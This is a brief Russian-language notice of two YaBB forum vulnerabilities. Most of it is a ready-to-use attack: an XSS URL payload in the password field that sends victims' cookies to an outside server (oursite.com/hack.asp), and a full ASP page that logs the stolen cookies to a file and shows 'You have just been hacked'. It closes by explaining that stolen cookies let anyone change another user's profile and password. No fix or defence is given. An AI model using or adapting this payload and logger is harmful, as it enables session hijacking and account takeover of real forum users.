В форуме YaBB обнаружено две уязвимости:
- Cross Site Scripting: программа не фильтрует теги
в поле пароля:
http://target.com/forums/index.php?board=; action=login2&user=USERNAME&
cookielength=120 &passwrd=PASSWORD>window.location.href(%22
http://www.oursite.com/hack.asp?%22%2B document.cookie)</script>
Можно построить целую страницу для кражи
паролей:
<%
Option Explicit
Const ForWriting = 2
Const ForAppending = 8
Const Create = True
Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")
MyFile = Server.MapPath("./db/log.txt")
Set FSO =
Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending,
Create)
if (Str <> "") then TSO.WriteLine Str
TSO.close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
- Смена профиля: любой пользователь может
изменить данные (включая и пароль) другого
юзера без пароля, для этого лишь нужно
получить куки.